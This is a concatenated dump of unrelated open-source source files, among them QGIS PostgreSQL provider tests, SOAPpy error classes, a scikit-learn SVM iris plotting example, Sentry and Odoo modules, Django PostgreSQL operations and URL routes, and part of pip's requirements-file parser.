vl = QgsVectorLayer(self.dbconn + ' sslmode=disable key=\'__rid__\' table="(SELECT row_number() OVER () AS __rid__, * FROM (SELECT * from qgis_test.some_poly_data a, qgis_test.some_poly_data b where ST_Intersects(a.geom,b.geom)) as foo)" sql=', 'test_36205', 'postgres')
self.assertTrue(vl.isValid())
self.assertEqual(vl.featureCount(), 3)
# This fails because the "geom" field and "pk" fields are ambiguous
# There is no easy fix: all duplicated fields should be explicitly aliased
# and the query internally rewritten
# feature = next(vl.getFeatures())
# self.assertTrue(vl.isValid())
def testUnrestrictedGeometryType(self):
"""Test geometry column with no explicit geometry type, regression GH #38565"""
md = QgsProviderRegistry.instance().providerMetadata("postgres")
conn = md.createConnection(self.dbconn, {})
# Cleanup if needed
try:
conn.dropVectorTable('qgis_test', 'test_unrestricted_geometry')
except QgsProviderConnectionException:
pass
conn.executeSql('''
CREATE TABLE "qgis_test"."test_unrestricted_geometry" (
gid serial primary key,
geom geometry(Geometry, 4326)
);''')
points = QgsVectorLayer(self.dbconn + ' sslmode=disable key=\'gid\' srid=4326 type=POINT table="qgis_test"."test_unrestricted_geometry" (geom) sql=', 'test_points', 'postgres')
lines = QgsVectorLayer(self.dbconn + ' sslmode=disable key=\'gid\' srid=4326 type=LINESTRING table="qgis_test"."test_unrestricted_geometry" (geom) sql=', 'test_lines', 'postgres')
polygons = QgsVectorLayer(self.dbconn + ' sslmode=disable key=\'gid\' srid=4326 type=POLYGON table="qgis_test"."test_unrestricted_geometry" (geom) sql=', 'test_polygons', 'postgres')
self.assertTrue(points.isValid())
self.assertTrue(lines.isValid())
self.assertTrue(polygons.isValid())
f = QgsFeature(points.fields())
f.setGeometry(QgsGeometry.fromWkt('point(9 45)'))
self.assertTrue(points.dataProvider().addFeatures([f]))
self.assertEqual(points.featureCount(), 1)
self.assertEqual(lines.featureCount(), 0)
self.assertEqual(polygons.featureCount(), 0)
# Fetch from iterator
self.assertTrue(compareWkt(next(points.getFeatures()).geometry().asWkt(), 'point(9 45)'))
with self.assertRaises(StopIteration):
next(lines.getFeatures())
with self.assertRaises(StopIteration):
next(polygons.getFeatures())
f.setGeometry(QgsGeometry.fromWkt('linestring(9 45, 10 46)'))
self.assertTrue(lines.dataProvider().addFeatures([f]))
self.assertEqual(points.featureCount(), 1)
self.assertEqual(lines.featureCount(), 1)
self.assertEqual(polygons.featureCount(), 0)
# Fetch from iterator
self.assertTrue(compareWkt(next(points.getFeatures()).geometry().asWkt(), 'point(9 45)'))
self.assertTrue(compareWkt(next(lines.getFeatures()).geometry().asWkt(), 'linestring(9 45, 10 46)'))
with self.assertRaises(StopIteration):
next(polygons.getFeatures())
# Test regression GH #38567 (no SRID requested in the data source URI)
# Cleanup if needed
conn.executeSql('DELETE FROM "qgis_test"."test_unrestricted_geometry" WHERE \'t\'')
points = QgsVectorLayer(self.dbconn + ' sslmode=disable key=\'gid\' type=POINT table="qgis_test"."test_unrestricted_geometry" (geom) sql=', 'test_points', 'postgres')
lines = QgsVectorLayer(self.dbconn + ' sslmode=disable key=\'gid\' type=LINESTRING table="qgis_test"."test_unrestricted_geometry" (geom) sql=', 'test_lines', 'postgres')
polygons = QgsVectorLayer(self.dbconn + ' sslmode=disable key=\'gid\' type=POLYGON table="qgis_test"."test_unrestricted_geometry" (geom) sql=', 'test_polygons', 'postgres')
self.assertTrue(points.isValid())
self.assertTrue(lines.isValid())
self.assertTrue(polygons.isValid())
def testTrustFlag(self):
"""Test regression https://github.com/qgis/QGIS/issues/38809"""
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'pk\' srid=4326 type=POINT table="qgis_test"."editData" (geom) sql=',
'testTrustFlag', 'postgres')
self.assertTrue(vl.isValid())
p = QgsProject.instance()
d = QTemporaryDir()
dir_path = d.path()
self.assertTrue(p.addMapLayers([vl]))
project_path = os.path.join(dir_path, 'testTrustFlag.qgs')
self.assertTrue(p.write(project_path))
del vl
p.clear()
self.assertTrue(p.read(project_path))
vl = p.mapLayersByName('testTrustFlag')[0]
self.assertTrue(vl.isValid())
self.assertFalse(p.trustLayerMetadata())
# Set the trust flag
p.setTrustLayerMetadata(True)
self.assertTrue(p.write(project_path))
# Re-read
p.clear()
self.assertTrue(p.read(project_path))
self.assertTrue(p.trustLayerMetadata())
vl = p.mapLayersByName('testTrustFlag')[0]
self.assertTrue(vl.isValid())
def testQueryLayerDuplicatedFields(self):
"""Test that duplicated fields from a query layer are returned"""
def _get_layer(sql):
return QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'__rid__\' table=\'(SELECT row_number() OVER () AS __rid__, * FROM (' + sql + ') as foo)\' sql=',
'test', 'postgres')
l = _get_layer('SELECT 1, 2')
self.assertEqual(l.fields().count(), 3)
self.assertEqual([f.name() for f in l.fields()], ['__rid__', '?column?', '?column? (2)'])
l = _get_layer('SELECT 1 as id, 2 as id')
self.assertEqual(l.fields().count(), 3)
self.assertEqual([f.name() for f in l.fields()], ['__rid__', 'id', 'id (2)'])
if __name__ == '__main__':
unittest.main()
| gpl-2.0 |
mazaclub/p2pool | SOAPpy/Errors.py | 294 | 3002 | """
################################################################################
#
# SOAPpy - Cayce Ullman (cayce@actzero.com)
# Brian Matthews (blm@actzero.com)
# Gregory Warnes (Gregory.R.Warnes@Pfizer.com)
# Christopher Blunck (blunck@gst.com)
#
################################################################################
# Copyright (c) 2003, Pfizer
# Copyright (c) 2001, Cayce Ullman.
# Copyright (c) 2001, Brian Matthews.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of actzero, inc. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
################################################################################
"""
ident = '$Id: Errors.py 921 2005-02-15 16:32:23Z warnes $'
from version import __version__
import exceptions
################################################################################
# Exceptions
################################################################################
class Error(exceptions.Exception):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return "<Error : %s>" % self.msg
__repr__ = __str__
def __call__(self):
return (msg,)
class RecursionError(Error):
pass
class UnknownTypeError(Error):
pass
class HTTPError(Error):
# indicates an HTTP protocol error
def __init__(self, code, msg):
self.code = code
self.msg = msg
def __str__(self):
return "<HTTPError %s %s>" % (self.code, self.msg)
__repr__ = __str__
def __call___(self):
return (self.code, self.msg, )
class UnderflowError(exceptions.ArithmeticError):
pass
| gpl-3.0 |
jmetzen/scikit-learn | examples/svm/plot_iris.py | 225 | 3252 | """
==================================================
Plot different SVM classifiers in the iris dataset
==================================================
Comparison of different linear SVM classifiers on a 2D projection of the iris
dataset. We only consider the first 2 features of this dataset:
- Sepal length
- Sepal width
This example shows how to plot the decision surface for four SVM classifiers
with different kernels.
The linear models ``LinearSVC()`` and ``SVC(kernel='linear')`` yield slightly
different decision boundaries. This can be a consequence of the following
differences:
- ``LinearSVC`` minimizes the squared hinge loss while ``SVC`` minimizes the
regular hinge loss.
- ``LinearSVC`` uses the One-vs-All (also known as One-vs-Rest) multiclass
reduction while ``SVC`` uses the One-vs-One multiclass reduction.
Both linear models have linear decision boundaries (intersecting hyperplanes)
while the non-linear kernel models (polynomial or Gaussian RBF) have more
flexible non-linear decision boundaries with shapes that depend on the kind of
kernel and its parameters.
.. NOTE:: while plotting the decision function of classifiers for toy 2D
datasets can help get an intuitive understanding of their respective
expressive power, be aware that those intuitions don't always generalize to
more realistic high-dimensional problems.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn import svm, datasets
# import some data to play with
iris = datasets.load_iris()
X = iris.data[:, :2] # we only take the first two features. We could
# avoid this ugly slicing by using a two-dim dataset
y = iris.target
h = .02 # step size in the mesh
# we create an instance of SVM and fit out data. We do not scale our
# data since we want to plot the support vectors
C = 1.0 # SVM regularization parameter
svc = svm.SVC(kernel='linear', C=C).fit(X, y)
rbf_svc = svm.SVC(kernel='rbf', gamma=0.7, C=C).fit(X, y)
poly_svc = svm.SVC(kernel='poly', degree=3, C=C).fit(X, y)
lin_svc = svm.LinearSVC(C=C).fit(X, y)
# create a mesh to plot in
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
# title for the plots
titles = ['SVC with linear kernel',
'LinearSVC (linear kernel)',
'SVC with RBF kernel',
'SVC with polynomial (degree 3) kernel']
for i, clf in enumerate((svc, lin_svc, rbf_svc, poly_svc)):
# Plot the decision boundary. For that, we will assign a color to each
# point in the mesh [x_min, m_max]x[y_min, y_max].
plt.subplot(2, 2, i + 1)
plt.subplots_adjust(wspace=0.4, hspace=0.4)
Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
# Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.contourf(xx, yy, Z, cmap=plt.cm.Paired, alpha=0.8)
# Plot also the training points
plt.scatter(X[:, 0], X[:, 1], c=y, cmap=plt.cm.Paired)
plt.xlabel('Sepal length')
plt.ylabel('Sepal width')
plt.xlim(xx.min(), xx.max())
plt.ylim(yy.min(), yy.max())
plt.xticks(())
plt.yticks(())
plt.title(titles[i])
plt.show()
| bsd-3-clause |
fotinakis/sentry | src/sentry/web/frontend/organization_member_settings.py | 6 | 4160 | from __future__ import absolute_import
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.db.models import Q
from django.utils.translation import ugettext_lazy as _, ugettext
from sentry import roles
from sentry.models import OrganizationMember, OrganizationMemberTeam, \
Team, TeamStatus
from sentry.utils import auth
from sentry.web.frontend.base import OrganizationView
from sentry.web.forms.edit_organization_member import EditOrganizationMemberForm
class OrganizationMemberSettingsView(OrganizationView):
def get_form(self, request, member, all_teams, allowed_roles):
return EditOrganizationMemberForm(
data=request.POST or None,
instance=member,
all_teams=all_teams,
allowed_roles=allowed_roles,
initial={
'role': member.role,
'teams': Team.objects.filter(
id__in=OrganizationMemberTeam.objects.filter(
organizationmember=member,
).values('team'),
),
},
)
def resend_invite(self, request, organization, member, regen=False):
if regen:
member.update(token=member.generate_token())
messages.success(request, ugettext('A new invitation has been generated and sent to %(email)s') % {
'organization': organization.name,
'email': member.email,
})
else:
messages.success(request, ugettext('An invitation to join %(organization)s has been sent to %(email)s') % {
'organization': organization.name,
'email': member.email,
})
member.send_invite_email()
redirect = reverse('sentry-organization-member-settings',
args=[organization.slug, member.id])
return self.redirect(redirect)
def view_member(self, request, organization, member, all_teams):
context = {
'member': member,
'enabled_teams': set(member.teams.all()),
'all_teams': all_teams,
'role_list': roles.get_all(),
}
return self.respond('sentry/organization-member-details.html', context)
def handle(self, request, organization, member_id):
try:
member = OrganizationMember.objects.get(
Q(user__is_active=True) | Q(user__isnull=True),
organization=organization,
id=member_id,
)
except OrganizationMember.DoesNotExist:
return self.redirect(auth.get_login_url())
if request.POST.get('op') == 'reinvite' and member.is_pending:
return self.resend_invite(request, organization, member)
elif request.POST.get('op') == 'regenerate' and member.is_pending:
return self.resend_invite(request, organization, member, regen=True)
can_admin, allowed_roles = self.get_allowed_roles(request, organization, member)
all_teams = Team.objects.filter(
organization=organization,
status=TeamStatus.VISIBLE
)
if member.user == request.user or not can_admin:
return self.view_member(request, organization, member, all_teams)
form = self.get_form(request, member, all_teams, allowed_roles)
if form.is_valid():
member = form.save(request.user, organization, request.META['REMOTE_ADDR'])
messages.add_message(request, messages.SUCCESS,
_('Your changes were saved.'))
redirect = reverse('sentry-organization-member-settings',
args=[organization.slug, member.id])
return self.redirect(redirect)
context = {
'member': member,
'form': form,
'invite_link': member.get_invite_link(),
'role_list': [
(r, r in allowed_roles)
for r in roles.get_all()
],
'all_teams': all_teams
}
return self.respond('sentry/organization-member-settings.html', context)
| bsd-3-clause |
CXQERP/ODOOERP | addons/decimal_precision/decimal_precision.py | 233 | 3728 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import openerp
from openerp import SUPERUSER_ID
from openerp import tools
from openerp.osv import orm, fields
from openerp.modules.registry import RegistryManager
class decimal_precision(orm.Model):
_name = 'decimal.precision'
_columns = {
'name': fields.char('Usage', select=True, required=True),
'digits': fields.integer('Digits', required=True),
}
_defaults = {
'digits': 2,
}
_sql_constraints = [
('name_uniq', 'unique (name)', """Only one value can be defined for each given usage!"""),
]
@tools.ormcache(skiparg=3)
def precision_get(self, cr, uid, application):
cr.execute('select digits from decimal_precision where name=%s', (application,))
res = cr.fetchone()
return res[0] if res else 2
def clear_cache(self, cr):
"""clear cache and update models. Notify other workers to restart their registry."""
self.precision_get.clear_cache(self)
RegistryManager.signal_registry_change(cr.dbname)
def create(self, cr, uid, data, context=None):
res = super(decimal_precision, self).create(cr, uid, data, context=context)
self.clear_cache(cr)
return res
def unlink(self, cr, uid, ids, context=None):
res = super(decimal_precision, self).unlink(cr, uid, ids, context=context)
self.clear_cache(cr)
return res
def write(self, cr, uid, ids, data, *args, **argv):
res = super(decimal_precision, self).write(cr, uid, ids, data, *args, **argv)
self.clear_cache(cr)
return res
def get_precision(application):
def change_digit(cr):
decimal_precision = openerp.registry(cr.dbname)['decimal.precision']
res = decimal_precision.precision_get(cr, SUPERUSER_ID, application)
return (16, res)
return change_digit
class DecimalPrecisionFloat(orm.AbstractModel):
""" Override qweb.field.float to add a `decimal_precision` domain option
and use that instead of the column's own value if it is specified
"""
_inherit = 'ir.qweb.field.float'
def precision(self, cr, uid, field, options=None, context=None):
dp = options and options.get('decimal_precision')
if dp:
return self.pool['decimal.precision'].precision_get(
cr, uid, dp)
return super(DecimalPrecisionFloat, self).precision(
cr, uid, field, options=options, context=context)
class DecimalPrecisionTestModel(orm.Model):
_name = 'decimal.precision.test'
_columns = {
'float': fields.float(),
'float_2': fields.float(digits=(16, 2)),
'float_4': fields.float(digits=(16, 4)),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
janekg89/flutype_webapp | flutype/urls.py | 1 | 4288 | from django.conf.urls import url
from django.contrib import admin
from django.conf.urls import url, include
from . import views
urlpatterns = [
url(r'^$', views.studies_view, name='index'),
url(r'^admin/', include(admin.site.urls), name='admin'),
url(r'^mystudies/$', views.my_studies_view, name='my_studies'),
url(r'^uploadfile_study/(?P<sid>.*)/$', views.upload_file_study, name='upload_file_study'),
url(r'^study/(?P<sid>.*)/$', views.study_view, name='study'),
url(r'^study/(?P<pk>.*)/edit$', views.study_edit, name='study_edit'),
url(r'^study/(?P<sid>.*)/import_measurement$', views.import_measurement_view, name='import_measurement'),
url(r'^studies/new/$', views.study_new, name='study_new'),
url(r'^study_ligands/(?P<sid>.*)/$', views.study_ligands_view, name='study_ligands'),
url(r'^tutorial_db/$', views.tutorial_db_view, name='tutorial_db'),
url(r'^glossary/$', views.glossary_view, name='glossary'),
url(r'^measurements/$', views.measurements_view, name='measurements'),
url(r'^mymeasurements/$', views.my_measurements_view, name='my_measurements'),
url(r'^measurement/(?P<sid>.*)/$',views.measurement_view, name='rawspotcollectionview'),
url(r'^measurement_ligands/(?P<sid>.*)/$', views.measurement_ligands_view, name='measurement_ligands'),
url(r'^m/(?P<measurement_sid>.*)/result/(?P<sid>.*)/$', views.measurement_result_view, name='qspotcollectionview'),
url(r'^m/(?P<measurement_sid>.*)/result/(?P<sid>.*)/data$', views.barplot_data_view, name='barplot_plotly1'),
url(r'^m/(?P<measurement_sid>.*)/result/(?P<sid>.*)/data2$', views.barplot2_data_view, name='barplot_plotly2'),
url(r'^m/(?P<measurement_sid>.*)/result/(?P<sid>.*)/barplot_p$', views.highcharts_view, name='heatmap_highchart1'),
url(r'^uploadfile_measurement/(?P<sid>.*)/$', views.upload_file_measurement, name='upload_file_measurement'),
url(r'^users/$', views.users_view, name='users'),
url(r'^about/$', views.about_en_view, name='about'),
url(r'^about_de/$', views.about_de_view, name='about_de'),
url(r'^database_scheme/$', views.database_scheme_en_view, name='database_scheme'),
url(r'^database_scheme_de/$', views.database_scheme_de_view, name='database_scheme_de'),
url(r'^gal_file/$', views.gal_file_view, name='gal_file'),
url(r'^raw_gal_file/$', views.raw_gal_file_view, name='raw_gal_file'),
url(r'^tutorial/$', views.tutorial_en_view, name='tutorial'),
url(r'^tree/$', views.tutorial_tree_view, name='tutorial_tree'),
url(r'^tutorial_de/$', views.tutorial_de_view, name='tutorial_de'),
url(r'^steps/$', views.steps_view, name='steps'),
url(r'^processes/$', views.processes_view, name='processes'),
url(r'^process/(?P<sid>.*)/$', views.process_view, name='processview'),
url(r'^image/processtep/(?P<id>.*)/$', views.image_process_view, name='imageviewprocess'),
url(r'^g/(?P<model_name>.*)/new/$', views.new_view, name='new'),
url(r'^ligandbatch/(?P<model_name>.*)/new/$', views.ligandbatch_new, name='new_ligandbatch'),
url(r'^studies/new/$', views.study_new, name='study_new'),
url(r'^g/(?P<model_name>.*)/(?P<pk>.*)/delete$', views.delete_view, name='delete'),
url(r'^g/(?P<model_name>.*)/(?P<pk>.*)/edit$', views.edit_view, name='edit'),
url(r'^buffers/$', views.buffer_view, name='buffers'),
url(r'^peptides/$', views.peptide_view, name='peptides'),
url(r'^complexes/$', views.complex_view, name='complexes'),
url(r'^viruses/$', views.virus_view, name='viruses'),
url(r'^antibodies/$', views.antibody_view, name='antibodies'),
url(r'^bufferbatches/$', views.buffer_batch_view, name='bufferbatches'),
url(r'^peptidebatches/$', views.peptide_batch_view, name='peptidebatches'),
url(r'^complexbatches/$', views.complex_batch_view, name='complexbatches'),
url(r'^virusbatches/$', views.virus_batch_view, name='virusbatches'),
url(r'^antibodybatches/$', views.antibody_batch_view, name='antibodybatches'),
url(r'^password/$', views.change_password_view, name='change_password'),
url(r'^qspotcollection/(?P<sid>.*)/data$', views.barplot_data_view, name='barplot_plotly'),
url(r'^qspotcollection/(?P<sid>.*)/barplot_p$', views.highcharts_view, name='heatmap_highchart'),
] | lgpl-3.0 |
zzzombat/lucid-python-django | django/db/backends/postgresql/operations.py | 229 | 9420 | import re
from django.db.backends import BaseDatabaseOperations
# This DatabaseOperations class lives in here instead of base.py because it's
# used by both the 'postgresql' and 'postgresql_psycopg2' backends.
class DatabaseOperations(BaseDatabaseOperations):
def __init__(self, connection):
super(DatabaseOperations, self).__init__()
self._postgres_version = None
self.connection = connection
def _get_postgres_version(self):
if self._postgres_version is None:
from django.db.backends.postgresql.version import get_version
cursor = self.connection.cursor()
self._postgres_version = get_version(cursor)
return self._postgres_version
postgres_version = property(_get_postgres_version)
def date_extract_sql(self, lookup_type, field_name):
# http://www.postgresql.org/docs/8.0/static/functions-datetime.html#FUNCTIONS-DATETIME-EXTRACT
if lookup_type == 'week_day':
# For consistency across backends, we return Sunday=1, Saturday=7.
return "EXTRACT('dow' FROM %s) + 1" % field_name
else:
return "EXTRACT('%s' FROM %s)" % (lookup_type, field_name)
def date_interval_sql(self, sql, connector, timedelta):
"""
implements the interval functionality for expressions
format for Postgres:
(datefield + interval '3 days 200 seconds 5 microseconds')
"""
modifiers = []
if timedelta.days:
modifiers.append(u'%s days' % timedelta.days)
if timedelta.seconds:
modifiers.append(u'%s seconds' % timedelta.seconds)
if timedelta.microseconds:
modifiers.append(u'%s microseconds' % timedelta.microseconds)
mods = u' '.join(modifiers)
conn = u' %s ' % connector
return u'(%s)' % conn.join([sql, u'interval \'%s\'' % mods])
def date_trunc_sql(self, lookup_type, field_name):
# http://www.postgresql.org/docs/8.0/static/functions-datetime.html#FUNCTIONS-DATETIME-TRUNC
return "DATE_TRUNC('%s', %s)" % (lookup_type, field_name)
def deferrable_sql(self):
return " DEFERRABLE INITIALLY DEFERRED"
def lookup_cast(self, lookup_type):
lookup = '%s'
# Cast text lookups to text to allow things like filter(x__contains=4)
if lookup_type in ('iexact', 'contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith'):
lookup = "%s::text"
# Use UPPER(x) for case-insensitive lookups; it's faster.
if lookup_type in ('iexact', 'icontains', 'istartswith', 'iendswith'):
lookup = 'UPPER(%s)' % lookup
return lookup
def field_cast_sql(self, db_type):
if db_type == 'inet':
return 'HOST(%s)'
return '%s'
def last_insert_id(self, cursor, table_name, pk_name):
# Use pg_get_serial_sequence to get the underlying sequence name
# from the table name and column name (available since PostgreSQL 8)
cursor.execute("SELECT CURRVAL(pg_get_serial_sequence('%s','%s'))" % (
self.quote_name(table_name), pk_name))
return cursor.fetchone()[0]
def no_limit_value(self):
return None
def quote_name(self, name):
if name.startswith('"') and name.endswith('"'):
return name # Quoting once is enough.
return '"%s"' % name
def sql_flush(self, style, tables, sequences):
if tables:
if self.postgres_version[0:2] >= (8,1):
# Postgres 8.1+ can do 'TRUNCATE x, y, z...;'. In fact, it *has to*
# in order to be able to truncate tables referenced by a foreign
# key in any other table. The result is a single SQL TRUNCATE
# statement.
sql = ['%s %s;' % \
(style.SQL_KEYWORD('TRUNCATE'),
style.SQL_FIELD(', '.join([self.quote_name(table) for table in tables]))
)]
else:
# Older versions of Postgres can't do TRUNCATE in a single call, so
# they must use a simple delete.
sql = ['%s %s %s;' % \
(style.SQL_KEYWORD('DELETE'),
style.SQL_KEYWORD('FROM'),
style.SQL_FIELD(self.quote_name(table))
) for table in tables]
# 'ALTER SEQUENCE sequence_name RESTART WITH 1;'... style SQL statements
# to reset sequence indices
for sequence_info in sequences:
table_name = sequence_info['table']
column_name = sequence_info['column']
if not (column_name and len(column_name) > 0):
# This will be the case if it's an m2m using an autogenerated
# intermediate table (see BaseDatabaseIntrospection.sequence_list)
column_name = 'id'
sql.append("%s setval(pg_get_serial_sequence('%s','%s'), 1, false);" % \
(style.SQL_KEYWORD('SELECT'),
style.SQL_TABLE(self.quote_name(table_name)),
style.SQL_FIELD(column_name))
)
return sql
else:
return []
def sequence_reset_sql(self, style, model_list):
from django.db import models
output = []
qn = self.quote_name
for model in model_list:
# Use `coalesce` to set the sequence for each model to the max pk value if there are records,
# or 1 if there are none. Set the `is_called` property (the third argument to `setval`) to true
# if there are records (as the max pk value is already in use), otherwise set it to false.
# Use pg_get_serial_sequence to get the underlying sequence name from the table name
# and column name (available since PostgreSQL 8)
for f in model._meta.local_fields:
if isinstance(f, models.AutoField):
output.append("%s setval(pg_get_serial_sequence('%s','%s'), coalesce(max(%s), 1), max(%s) %s null) %s %s;" % \
(style.SQL_KEYWORD('SELECT'),
style.SQL_TABLE(qn(model._meta.db_table)),
style.SQL_FIELD(f.column),
style.SQL_FIELD(qn(f.column)),
style.SQL_FIELD(qn(f.column)),
style.SQL_KEYWORD('IS NOT'),
style.SQL_KEYWORD('FROM'),
style.SQL_TABLE(qn(model._meta.db_table))))
break # Only one AutoField is allowed per model, so don't bother continuing.
for f in model._meta.many_to_many:
if not f.rel.through:
output.append("%s setval(pg_get_serial_sequence('%s','%s'), coalesce(max(%s), 1), max(%s) %s null) %s %s;" % \
(style.SQL_KEYWORD('SELECT'),
style.SQL_TABLE(qn(f.m2m_db_table())),
style.SQL_FIELD('id'),
style.SQL_FIELD(qn('id')),
style.SQL_FIELD(qn('id')),
style.SQL_KEYWORD('IS NOT'),
style.SQL_KEYWORD('FROM'),
style.SQL_TABLE(qn(f.m2m_db_table()))))
return output
def savepoint_create_sql(self, sid):
return "SAVEPOINT %s" % sid
def savepoint_commit_sql(self, sid):
return "RELEASE SAVEPOINT %s" % sid
def savepoint_rollback_sql(self, sid):
return "ROLLBACK TO SAVEPOINT %s" % sid
def prep_for_iexact_query(self, x):
return x
def check_aggregate_support(self, aggregate):
"""Check that the backend fully supports the provided aggregate.
The population and sample statistics (STDDEV_POP, STDDEV_SAMP,
VAR_POP, VAR_SAMP) were first implemented in Postgres 8.2.
The implementation of population statistics (STDDEV_POP and VAR_POP)
under Postgres 8.2 - 8.2.4 is known to be faulty. Raise
NotImplementedError if this is the database in use.
"""
if aggregate.sql_function in ('STDDEV_POP', 'STDDEV_SAMP', 'VAR_POP', 'VAR_SAMP'):
if self.postgres_version[0:2] < (8,2):
raise NotImplementedError('PostgreSQL does not support %s prior to version 8.2. Please upgrade your version of PostgreSQL.' % aggregate.sql_function)
if aggregate.sql_function in ('STDDEV_POP', 'VAR_POP'):
if self.postgres_version[0:2] == (8,2):
if self.postgres_version[2] is None or self.postgres_version[2] <= 4:
raise NotImplementedError('PostgreSQL 8.2 to 8.2.4 is known to have a faulty implementation of %s. Please upgrade your version of PostgreSQL.' % aggregate.sql_function)
def max_name_length(self):
"""
Returns the maximum length of an identifier.
Note that the maximum length of an identifier is 63 by default, but can
be changed by recompiling PostgreSQL after editing the NAMEDATALEN
macro in src/include/pg_config_manual.h .
This implementation simply returns 63, but can easily be overridden by a
custom database backend that inherits most of its behavior from this one.
"""
return 63
| bsd-3-clause |
ZhangXinNan/tensorflow | tensorflow/python/keras/datasets/__init__.py | 62 | 1264 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Keras built-in datasets."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.keras.datasets import boston_housing
from tensorflow.python.keras.datasets import cifar10
from tensorflow.python.keras.datasets import cifar100
from tensorflow.python.keras.datasets import fashion_mnist
from tensorflow.python.keras.datasets import imdb
from tensorflow.python.keras.datasets import mnist
from tensorflow.python.keras.datasets import reuters
del absolute_import
del division
del print_function
| apache-2.0 |
biodrone/plex-desk | desk/flask/lib/python3.4/site-packages/pip/req/req_file.py | 85 | 5511 | from __future__ import absolute_import
import os
import re
from pip._vendor.six.moves.urllib import parse as urllib_parse
from pip.download import get_file_content
from pip.req.req_install import InstallRequirement
from pip.utils import normalize_name
_scheme_re = re.compile(r'^(http|https|file):', re.I)
def parse_requirements(filename, finder=None, comes_from=None, options=None,
session=None):
if session is None:
raise TypeError(
"parse_requirements() missing 1 required keyword argument: "
"'session'"
)
skip_match = None
skip_regex = options.skip_requirements_regex if options else None
if skip_regex:
skip_match = re.compile(skip_regex)
reqs_file_dir = os.path.dirname(os.path.abspath(filename))
filename, content = get_file_content(
filename,
comes_from=comes_from,
session=session,
)
for line_number, line in enumerate(content.splitlines(), 1):
line = line.strip()
# Remove comments from file
line = re.sub(r"(^|\s)#.*$", "", line)
if not line or line.startswith('#'):
continue
if skip_match and skip_match.search(line):
continue
if line.startswith('-r') or line.startswith('--requirement'):
if line.startswith('-r'):
req_url = line[2:].strip()
else:
req_url = line[len('--requirement'):].strip().strip('=')
if _scheme_re.search(filename):
# Relative to a URL
req_url = urllib_parse.urljoin(filename, req_url)
elif not _scheme_re.search(req_url):
req_url = os.path.join(os.path.dirname(filename), req_url)
for item in parse_requirements(
req_url, finder,
comes_from=filename,
options=options,
session=session):
yield item
elif line.startswith('-Z') or line.startswith('--always-unzip'):
# No longer used, but previously these were used in
# requirement files, so we'll ignore.
pass
elif line.startswith('-f') or line.startswith('--find-links'):
if line.startswith('-f'):
line = line[2:].strip()
else:
line = line[len('--find-links'):].strip().lstrip('=')
# FIXME: it would be nice to keep track of the source of
# the find_links:
# support a find-links local path relative to a requirements file
relative_to_reqs_file = os.path.join(reqs_file_dir, line)
if os.path.exists(relative_to_reqs_file):
line = relative_to_reqs_file
if finder:
finder.find_links.append(line)
elif line.startswith('-i') or line.startswith('--index-url'):
if line.startswith('-i'):
line = line[2:].strip()
else:
line = line[len('--index-url'):].strip().lstrip('=')
if finder:
finder.index_urls = [line]
elif line.startswith('--extra-index-url'):
line = line[len('--extra-index-url'):].strip().lstrip('=')
if finder:
finder.index_urls.append(line)
elif line.startswith('--use-wheel'):
# Default in 1.5
pass
elif line.startswith('--no-use-wheel'):
if finder:
finder.use_wheel = False
elif line.startswith('--no-index'):
if finder:
finder.index_urls = []
